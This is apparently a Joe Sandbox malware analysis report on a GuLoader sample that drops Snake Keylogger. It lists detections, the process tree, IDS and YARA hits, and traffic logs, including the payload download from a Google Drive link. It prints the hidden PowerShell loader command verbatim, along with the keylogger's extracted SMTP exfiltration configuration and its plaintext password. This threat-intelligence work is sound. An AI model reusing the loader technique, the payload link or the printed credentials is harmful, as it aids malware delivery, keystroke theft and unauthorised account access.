Edit tour

Windows Analysis Report
ln5S7fIBkY.exe

Overview

General Information

Sample name:	ln5S7fIBkY.exe renamed because original name is a hash value
Original sample name:	4f0c13bf16b4e53b1513e2b268aec15c6c2a043f88a58dea69c88e25eb920853.exe
Analysis ID:	1587628
MD5:	e38257f3eaa78e2dca3c3063b05eaa70
SHA1:	250d9151f64818a8bfa51d3714a6ddb214303495
SHA256:	4f0c13bf16b4e53b1513e2b268aec15c6c2a043f88a58dea69c88e25eb920853
Tags:	exeuser-adrian__luca
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Early bird code injection technique detected

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Yara detected Snake Keylogger

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Powershell drops PE file

Queues an APC in another process (thread injection)

Suspicious powershell command line found

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Abnormal high CPU Usage

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Msiexec Initiated Connection

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

System is w10x64

ln5S7fIBkY.exe (PID: 7100 cmdline: "C:\Users\user\Desktop\ln5S7fIBkY.exe" MD5: E38257F3EAA78E2DCA3C3063B05EAA70)

powershell.exe (PID: 3348 cmdline: "powershell.exe" -windowstyle hidden "$Appeachment=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Sharpness.Kon';$Oplandsavises=$Appeachment.SubString(12242,3);.$Oplandsavises($Appeachment)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 5400 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "administracion@teyvi.es", "Password": "jrpM0Y5k", "Host": "smtp.securemail.pro", "Port": "587", "Version": "5.1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000007.00000002.2772117735.00000000247B0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000007.00000002.2772117735.00000000245F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000002.00000002.2353301520.000000000C110000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: msiexec.exe PID: 5400	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security

Sigma Signatures

System Summary

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DesusertionIp: 172.217.16.206, DesusertionIsIpv6: false, DesusertionPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5400, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49861

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3348, TargetFilename: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\ln5S7fIBkY.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle hidden "$Appeachment=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Sharpness.Kon';$Oplandsavises=$Appeachment.SubString(12242,3);.$Oplandsavises($Appeachment)", CommandLine: "powershell.exe" -windowstyle hidden "$Appeachment=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Sharpness.Kon';$Oplandsavises=$Appeachment.SubString(12242,3);.$Oplandsavises($Appeachment)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\ln5S7fIBkY.exe", ParentImage: C:\Users\user\Desktop\ln5S7fIBkY.exe, ParentProcessId: 7100, ParentProcessName: ln5S7fIBkY.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Appeachment=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Sharpness.Kon';$Oplandsavises=$Appeachment.SubString(12242,3);.$Oplandsavises($Appeachment)", ProcessId: 3348, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T16:02:47.164708+0100	2803305	3	Unknown Traffic	192.168.2.9	49915	104.21.112.1	443	TCP
2025-01-10T16:02:48.406269+0100	2803305	3	Unknown Traffic	192.168.2.9	49924	104.21.112.1	443	TCP
2025-01-10T16:02:49.686592+0100	2803305	3	Unknown Traffic	192.168.2.9	49933	104.21.112.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T16:02:44.961622+0100	2803274	2	Potentially Bad Traffic	192.168.2.9	49897	193.122.6.168	80	TCP
2025-01-10T16:02:46.586583+0100	2803274	2	Potentially Bad Traffic	192.168.2.9	49897	193.122.6.168	80	TCP
2025-01-10T16:02:47.867821+0100	2803274	2	Potentially Bad Traffic	192.168.2.9	49921	193.122.6.168	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-10T16:02:40.162656+0100	2803270	2	Potentially Bad Traffic	192.168.2.9	49861	172.217.16.206	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: ln5S7fIBkY.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\ln5S7fIBkY.exe

Avira: detection malicious, Label: TR/Injector.ekjwr

Found malware configuration

Source: 00000007.00000002.2772117735.00000000245F1000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "administracion@teyvi.es", "Password": "jrpM0Y5k", "Host": "smtp.securemail.pro", "Port": "587", "Version": "5.1"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\ln5S7fIBkY.exe	ReversingLabs: Detection: 62%
Source: C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\ln5S7fIBkY.exe	Virustotal: Detection: 68%			Perma Link

Multi AV Scanner detection for submitted file

Source: ln5S7fIBkY.exe	Virustotal: Detection: 68%			Perma Link
Source: ln5S7fIBkY.exe	ReversingLabs: Detection: 62%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27489350 CryptUnprotectData,		7_2_27489350
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 7_2_27489999 CryptUnprotectData,		7_2_27489999

Source: ln5S7fIBkY.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.9:49909 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.9:49861 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.9:49871 version: TLS 1.2

Source: ln5S7fIBkY.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: qm.Core.pdb source: powershell.exe, 00000002.00000002.2352305297.0000000008D80000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: tem.Core.pdb source: powershell.exe, 00000002.00000002.2352305297.0000000008D80000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdb$ source: powershell.exe, 00000002.00000002.2352305297.0000000008D6D000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\ln5S7fIBkY.exe	Code function: 0_2_00402868 FindFirstFileW,	0_2_00402868
Source: C:\Users\user\Desktop\ln5S7fIBkY.exe	Code function: 0_2_004065DA FindFirstFileW,FindClose,	0_2_004065DA
Source: C:\Users\user\Desktop\ln5S7fIBkY.exe	Code function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_004059A9

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 006BF1F6h	7_2_006BF007
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 006BFB80h	7_2_006BF007
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_006BE528
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_006BEB5B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_006BED3C
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27451A38h	7_2_27451620
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27451471h	7_2_274511C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 274502F1h	7_2_27450040
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2745E301h	7_2_2745E058
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2745D5F9h	7_2_2745D350
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2745DA51h	7_2_2745D7A8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2745C8F1h	7_2_2745C648
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2745FD11h	7_2_2745FA68
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2745F8B9h	7_2_2745F610
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27451A38h	7_2_27451610
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2745D1A1h	7_2_2745CEF8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2745CD49h	7_2_2745CAA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2745BBE9h	7_2_2745B940
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27451A38h	7_2_27451966
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2745F009h	7_2_2745ED60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27451011h	7_2_27450D60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27450BB1h	7_2_27450900
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2745EBB1h	7_2_2745E908
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2745C499h	7_2_2745C1F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2745C041h	7_2_2745BD98
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2745F461h	7_2_2745F1B8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2745DEA9h	7_2_2745DC00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2745B791h	7_2_2745B4E8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27450751h	7_2_274504A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 2745E759h	7_2_2745E4B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27488945h	7_2_27488608
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27486A21h	7_2_27486778
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 274865C9h	7_2_27486320
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27486E79h	7_2_27486BD0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_274833A8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_274833B8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27485D19h	7_2_27485A70
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 274858C1h	7_2_27485618
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27486171h	7_2_27485EC8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_274836CE
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27480FF1h	7_2_27480D48
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27488001h	7_2_27487D58
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27487BA9h	7_2_27487900
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27485441h	7_2_27485198
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27488459h	7_2_274881B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 274802E9h	7_2_27480040
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 274872FAh	7_2_27487050
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27480B99h	7_2_274808F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27480741h	7_2_27480498
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 27487751h	7_2_274874A8

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1
Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49921 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49897 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49915 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49933 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49924 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49861 -> 172.217.16.206:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1YDOjrO-TMUNWWbj81mfMZC8-_SfrF2Cg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1YDOjrO-TMUNWWbj81mfMZC8-_SfrF2Cg&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.9:49909 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1YDOjrO-TMUNWWbj81mfMZC8-_SfrF2Cg HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1YDOjrO-TMUNWWbj81mfMZC8-_SfrF2Cg&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: msiexec.exe, 00000007.00000002.2772117735.000000002474A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024794000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024758000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.00000000247A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: msiexec.exe, 00000007.00000002.2772117735.000000002474A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.000000002469E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024794000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024758000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.00000000247A2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024774000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: msiexec.exe, 00000007.00000002.2772117735.00000000245F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: ln5S7fIBkY.exe, 00000000.00000000.1510063030.000000000040A000.00000008.00000001.01000000.00000003.sdmp, ln5S7fIBkY.exe, 00000000.00000002.1542528019.000000000040A000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.2341443338.0000000006407000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2337899026.00000000054F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: msiexec.exe, 00000007.00000002.2772117735.000000002474A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024794000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.0000000024758000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.00000000246C2000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.00000000247A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: powershell.exe, 00000002.00000002.2337899026.00000000053A1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2772117735.00000000245F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2337899026.00000000054F5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2337899026.00000000053A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: msiexec.exe, 00000007.00000003.2492660590.0000000008E44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
